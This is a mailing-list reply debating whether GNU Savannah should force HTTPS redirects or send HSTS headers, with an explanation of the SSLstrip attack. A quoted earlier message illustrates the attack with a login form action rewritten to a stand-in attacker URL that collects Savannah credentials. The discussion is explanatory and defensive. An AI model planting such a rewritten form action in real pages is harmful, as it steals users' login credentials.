Re: [Repo-criteria-discuss] [Savannah-hackers-public] Savannah and HTTPS

[Michal Grochmal]

I'm just a random person that follows savannah-hackers-gnu but I'd like
to add the nature of the SSLstrip attack to this discussion.  Since I
did perform the attack myself a handful of times (no, I did not do
anything bad, I'm a security researcher).

There is one important point about SSLstrip that is missing, see below.

>>> It says to support HTTPS properly and *securely*. The current
>>> variant is not secure, it is vulnerable to SSL Stripping attacks.
>>> That's why HSTS was invented in the first place.  
>>
>> I don't know what you are talking about.
>
> Ok, I'll try to explain in more detail:
> * A Savannah user surfs to the savannah webpage, e.g. through a link,
>   the page is delivered over HTTP.
> * He clicks on Login. Still HTTP.
> * The login page contains a form with this:
> action="https://savannah.gnu.org/account/login.php";
> * However as that login page itself was not protected a network-level
>   attacker can just change that to something like:
> action="http://evilhackersdomain.com/getsavannahcredentials.cgi";
> * From there the attacker will grab the login data and just forward the
>   user back to the real savannah login.

That is completely true, but a careful user will *not* attempt login
through a page served over HTTP.  HTTPS will give the user privacy and
integrity but it is the user's choice to have them or not.

As far as I am aware, that is the philosophy of the FSF: always give the
user the choice, do not limit the user in anyway.  Even more if we are
limiting the user because of security reasons.

Although I would in several occasions perform the HTTP->HTTPS redirect
because it is a consensus of the information security community and
because I want to protect unknowing users, I'm completely against this
being implemented by the FSF.  This is because it goes against the FSF
philosophy of empowering the user.

> The attacker has the login credentials and the user noted nothing. This
> scenario and similar ones is called an SSL Stripping attack, I think
> the term was coined by Moxie Marlinspike in a talk in 2009:
> https://moxie.org/software/sslstrip/

SSLstrip is an attack on the user not on the protocol.  The user tries
to load a page through HTTPS but the gateway (attacker's machine)
performs the HTTPS connection and serves the page to the user in plain
HTTP.

The user's browser do not show the page as HTTPS in the address bar.  If
the user notices the fact that the page was served as HTTP the attack
fails.

> > I don't understand those words.  I can only say that the conclusion,
> > "Security requres discontinuing support for HTTP," is an extraordinary
> > claim and requires extraordinary proof.  I am extremely skeptical.
> 
> You may find that an extraordinary claim, but it's widely consensus
> among people caring about web security. There's a reason many want an
> HTTPS-only web.

Final thoughts:

I'm definitely against an HTTP->HTTPS redirect for the reasons above.
But I do not see such issues in adding the HSTS headers to HTTPS
communications from savannah.  A user can always delete their browser
cache (and the HSTS configuration within), or even disable HSTS in the
browser (a browser that respects a user's choices should allow the user
to disable HSTS).

-- 
Mike Grochmal
key ID 0xC840C4F6

pgpXWTBoBxjdc.pgp
Description: PGP signature